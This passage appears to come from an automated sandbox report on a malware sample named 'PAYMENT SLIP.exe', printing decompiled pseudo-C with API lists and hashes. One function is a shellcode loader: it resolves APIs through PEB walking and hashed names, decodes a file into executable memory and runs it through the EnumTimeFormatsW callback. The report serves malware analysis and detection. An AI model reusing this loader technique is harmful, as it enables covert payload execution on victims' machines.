						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653C(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C06(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004055A4(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a308 =  *0x42a308 + 1;
										} else {
											E004055A4(0xfffffff1, _t68);
											E00406302(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C4E(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040689A(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E11(_t68);
							_t38 = E00405C06(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004055A4(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004055A4(0xfffffff1, _t68);
							return E00406302(_t67, _t68, 0);
						}
						L30:
						 *0x42a308 =  *0x42a308 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















              0x00405c58
              0x00405c5d
              0x00405c66
              0x00405c69
              0x00405c71
              0x00405c74
              0x00405c77
              0x00405c7f
              0x00405c81
              0x00405c82
              0x00000000
              0x00405c82
              0x00405c8d
              0x00405c90
              0x00405c90
              0x00405c90
              0x00405c94
              0x00405ca7
              0x00405cae
              0x00405cb3
              0x00405cb7
              0x00405cc7
              0x00405cb9
              0x00405cbf
              0x00405cbf
              0x00405ccc
              0x00405cd0
              0x00405cdc
              0x00405ce2
              0x00405ce7
              0x00405ced
              0x00405cf8
              0x00405cfe
              0x00405d00
              0x00405d03
              0x00405dad
              0x00405dad
              0x00405db1
              0x00405db3
              0x00405db3
              0x00405db3
              0x00405db3
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00405d09
              0x00405d09
              0x00405d09
              0x00405d11
              0x00405d31
              0x00405d39
              0x00405d3e
              0x00405d45
              0x00405d60
              0x00405d65
              0x00405d67
              0x00405d8b
              0x00405d69
              0x00405d69
              0x00405d6c
              0x00405d80
              0x00405d6e
              0x00405d71
              0x00405d79
              0x00405d79
              0x00405d6c
              0x00405d47
              0x00405d4d
              0x00405d4f
              0x00405d55
              0x00405d55
              0x00405d4f
              0x00000000
              0x00405d45
              0x00405d13
              0x00405d1b
              0x00000000
              0x00000000
              0x00405d1d
              0x00405d25
              0x00000000
              0x00000000
              0x00405d27
              0x00405d2f
              0x00000000
              0x00000000
              0x00000000
              0x00405d90
              0x00405d98
              0x00405d9e
              0x00405d9e
              0x00405da7
              0x00000000
              0x00405da7
              0x00405cd2
              0x00405cda
              0x00000000
              0x00000000
              0x00000000
              0x00405c96
              0x00405c96
              0x00405c98
              0x00405db8
              0x00405dba
              0x00405dbd
              0x00405e0e
              0x00405e0e
              0x00405e0e
              0x00405dbf
              0x00405dc2
              0x00405dcd
              0x00405dd2
              0x00405dd4
              0x00000000
              0x00000000
              0x00405dd7
              0x00405de3
              0x00405de8
              0x00405dea
              0x00000000
              0x00405e05
              0x00405dec
              0x00405def
              0x00000000
              0x00000000
              0x00405df4
              0x00000000
              0x00405dfb
              0x00405dc4
              0x00405dc4
              0x00000000
              0x00405dc4
              0x00405c9e
              0x00405ca1
              0x00000000
              0x00000000
              0x00000000
              0x00405ca1

              APIs
              • DeleteFileW.KERNELBASE(?,?,73BCFAA0,73BCF560,00000000), ref: 00405C77
              • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405CBF
              • lstrcatW.KERNEL32(?,0040A014), ref: 00405CE2
              • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,73BCFAA0,73BCF560,00000000), ref: 00405CE8
              • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,73BCFAA0,73BCF560,00000000), ref: 00405CF8
              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D98
              • FindClose.KERNEL32(00000000), ref: 00405DA7
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
              • String ID: "C:\Users\user\Desktop\PAYMENT SLIP.exe" $PWB$\*.*
              • API String ID: 2035342205-2540126300
              • Opcode ID: 19551799e8c5b82fe64fd6c9cdad713e8761b335c3851407baa620d6eabf161c
              • Instruction ID: 388f2befc2087cc18a81576ce5b748581f321be521e7d033b0a51c5b8adb9818
              • Opcode Fuzzy Hash: 19551799e8c5b82fe64fd6c9cdad713e8761b335c3851407baa620d6eabf161c
              • Instruction Fuzzy Hash: C141CF30800A14BADB21AB65DC8DABF7678EF41718F50813BF841B51D1D77C4A82DEAE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 10001000, Relevance: 6.1, APIs: 4, Instructions: 94filememorytimeCOMMON
              Download Yara Rule
              C-Code - Quality: 76%
              			E10001000(void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v536;
				intOrPtr* _t24;
				void* _t33;
				_Unknown_base(*)()* _t34;
				int _t37;
				void* _t43;
				_Unknown_base(*)()* _t50;

				_v8 = 0;
				_t49 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				_v12 = E10001160( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8a111d91);
				_t24 = E10001160( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0xa4f84a9a);
				_v16 = E10001160(_t49, 0x433a3842);
				E10001160(_t49, 0xa5f15738);
				 *((intOrPtr*)(E10001160(_t49, 0xcbec1a0)))();
				 *_t24( &_v536, 0x10003000, 0x103,  &_v536);
				_t33 = CreateFileW( &_v536, 0x80000000, 7, 0, 3, 0x80, 0);
				_t34 = VirtualAlloc(0, 0x2605, 0x3000, 0x40); // executed
				_t50 = _t34;
				ReadFile(_t33, _t50, 0x2605,  &_v8, 0);
				_t43 = 0;
				if(_v8 > 0) {
					do {
						asm("rol al, 0x2");
						asm("ror dl, 0x3");
						 *((char*)(_t50 + _t43)) = (0x0000008b - ( *((intOrPtr*)(_t50 + _t43)) - _t43 ^ 0x000000af) - 0x0000000f + 0x0000006d ^ 0x000000ab) + _t43;
						_t43 = _t43 + 1;
					} while (_t43 < _v8);
				}
				_t37 = EnumTimeFormatsW(_t50, 0, 0); // executed
				return _t37;
			}













              0x1000100c
              0x10001026
              0x10001039
              0x1000103c
              0x10001054
              0x10001057
              0x1000107b
              0x10001089
              0x100010a4
              0x100010b7
              0x100010bb
              0x100010c8
              0x100010cb
              0x100010d0
              0x100010d2
              0x100010db
              0x100010e2
              0x100010ed
              0x100010f0
              0x100010f1
              0x100010d2
              0x100010fb
              0x10001107

              APIs
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100010A4
              • VirtualAlloc.KERNELBASE(00000000,00002605,00003000,00000040), ref: 100010B7
              • ReadFile.KERNELBASE(00000000,00000000,00002605,00000000,00000000), ref: 100010C8
              • EnumTimeFormatsW.KERNELBASE(00000000,00000000,00000000), ref: 100010FB
              Memory Dump Source
              • Source File: 00000001.00000002.666317436.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
              • Associated: 00000001.00000002.666313199.0000000010000000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.666320964.0000000010002000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$AllocCreateEnumFormatsReadTimeVirtual
              • String ID:
              • API String ID: 2368423067-0
              • Opcode ID: f8b3d7d4a39986d6bae475cfe36f2701f0fd0e74feb46f7325d8fa9007a450a2
              • Instruction ID: abb1b4136d9a97cfd6d81992380cf3c36c0eb88f57820bed56c925a8e29c0db0
              • Opcode Fuzzy Hash: f8b3d7d4a39986d6bae475cfe36f2701f0fd0e74feb46f7325d8fa9007a450a2
              • Instruction Fuzzy Hash: 7621E735A40308BFF711D7B4CC8AFDAB7BCEB55B90F000099F604EB291E6756A058A65
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406C5B, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 98%
              			E00406C5B() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
